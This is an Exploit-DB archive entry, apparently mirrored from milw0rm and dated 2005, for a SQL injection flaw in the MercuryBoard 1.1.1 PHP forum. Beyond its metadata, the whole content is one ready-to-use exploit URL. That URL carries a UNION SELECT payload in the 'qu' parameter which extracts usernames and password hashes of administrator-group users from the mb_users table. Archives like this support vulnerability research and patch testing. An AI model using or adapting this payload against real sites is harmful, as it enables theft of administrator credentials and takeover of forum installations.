MercuryBoard 1.1.1 - SQL Injection

EDB-ID:

814


Author:

Zeelock

Type:

webapps


Platform:

PHP

Date:

2005-02-12


# little late posting this /str0ke

Exploit:

http://www.site.com/mercuryboard/index.php?a=post&s=reply&t=1&qu=10000%20UNION%20SELECT%20user_password,user_name%20from%20mb_users%20where%20user_group%20=%201%20limit%201/*

# milw0rm.com [2005-02-12]